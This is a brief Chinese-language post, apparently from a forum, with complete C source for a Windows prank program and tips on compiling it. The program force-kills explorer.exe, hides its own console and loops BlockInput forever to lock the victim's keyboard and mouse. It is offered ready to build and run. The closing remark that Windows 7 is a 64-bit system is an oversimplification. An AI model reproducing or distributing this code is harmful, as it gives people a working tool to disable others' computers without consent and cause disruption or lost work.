源碼如下
#include <stdio.h>
#include <windows.h>
#include <mmsystem.h>
#include <Winable.h>
#pragma comment(lib, "winmm.lib")
int main()
{
PlaySound (TEXT("Light.wav"), NULL, SND_ASYNC | SND_NODEFAULT);
system("taskkill /f /im explorer.exe");
system("@echo xx");
Sleep(2000);
FreeConsole();
while(1){
BlockInput(true);
while(1)
{
BlockInput(true); //阻塞輸入 鎖定鍵盤鼠標 但是ctrl+alt+delete 可以使用
printf("0 1 0 1 ") ;
}
}
return 0;
}
在工具菜單,選擇編譯選項,選擇32位的編譯環境就OK了,XP是32位的操作系統,WIN7是64位的操作系統,
你想要在32位的操作系統運行64位的程序,計算機都不願意,